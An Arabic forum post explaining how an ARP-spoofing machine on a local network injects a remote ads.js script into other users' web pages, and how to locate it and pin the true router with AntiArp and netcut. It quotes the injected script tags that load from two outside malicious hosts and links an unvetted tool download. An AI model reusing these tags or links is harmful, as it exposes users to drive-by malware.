الحل القاتل لفيرس http://g.asdafdgfgf.com/ads.js و http://hk.www404.cn:53/ads.js و مشاكل الشبكة
بسم الله الرحمن الرحيم
الوقاية خير من العلاج
الحل بدون فورمات و بدون أي برامج انتي فايرس
----------------------------------------------------
المشكلة سببها إن فيه جهاز في الشبكة بيعمل spoof (ممكن نقولها تجسس) ببرنامج arpspoof أو بأي برنامج آخر و في هذه الحالة يكون
الجهاز بمثابة الراوتر للأجهزة الأخرى أي أنه ينتحل شكصية الراوتر
و الجهاز دا مصاب بالفيرس و بالتالي فإن كل الأجهزة المتصلة على الشبكة تصاب بالفيرس المتمثل في كود جافا سكريبت بينضاف لكل
صفحة نت يتم فتحها
الكود الذي يضاف كان من قبل
<SCRIPT LANGUAGE="s c r i p t 1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT>
و الإصدار الجديد منه هو
<script language="s c r i p t" SRC="http://hk.www404.cn:53/ads.js"></script>
و لكي تعرف هذا الجهاز الذي يخرب في الشبكة - و غالباً هو مش بيكون عارف إنه مصاب بالفيرس - إستخدم برنامج AntiArp
حمل البرنامج و فك الضغط ستجد
شرح الإستخدام الصحيح لبرنامج AntiArp
لو جهازك فيه الفيرس و شغلت البرنامج ستجد الرقم الموجود ( mac address ) مثال ( 00-14-85-78-05-62 ) هذا هو عنوان الجهاز الذي
يقوم بعمل spoof في الشبكة
نقوم بفتح برناج netcut - و نبحث عن نفس الرقم تحت خانة Physical address سيكون مثل ( 00:14:85:78:05:62 ) - مع إستبدال
الشرطة بـ ":"
و نعرفه هو مين نتصرف معاه بعدين بالطريقة المناسبة
سنجد الآي بي الخاص به نفس آي بي الراوتر و سيكون في أعلى القائمة ، و يكون الآي بي الآخر المشابه له هو آيبي الراوتر الحقيقي
مثلاُ ( 10.0.0.2 )
و نقم بنسخ القيمة المقابلة ( physical Address ) و ستكون مثلاُ ( 00:30:CA:815:AE ) ننسخها في ملف نصي سنحتاجه دائماً و لن
يتغير بعد ذلك ( يكون ثابت لنفس الراوتر دائماً ) ، نضع هذا العنوان في برنامج AntiArp بدلاً من عنوان الجهاز الراوتر المزيف و يكون عنوان
الراوتر مثلاُ ( 00:30:CA:815:AE ) و تقوم بعمل Stop ثم Run
و بذلك فأنت متصل بالراوتر الحقيقي و ليس بأي جهاز آخر على الشبكة
الطريقة دي بتحميك من الجسس على جهازك من على الشبكة اللي انت متصل بها
و برنامج AntiArp هذه آمنه و لا تسبب أي مشاكل للجهاز على الإطلاق ( حيث يوجد نسخة أخرى تسبب مشاكل في الهاردوير للجهاز )
و الرابط التالي به برنامج الـ AntiArp و برنامج الـ Netcut
ستجد ملف WinPcap_4_0 قم بتسطيبه أولاً ثم قم بتسطيب الـ Netcut و الـ AntiArp يعمل بدون تسطيب
http://up.mehalla.net/?d=mehalla_net_sO3nkqayLl.zip
و اي مشكلة أنا حاضر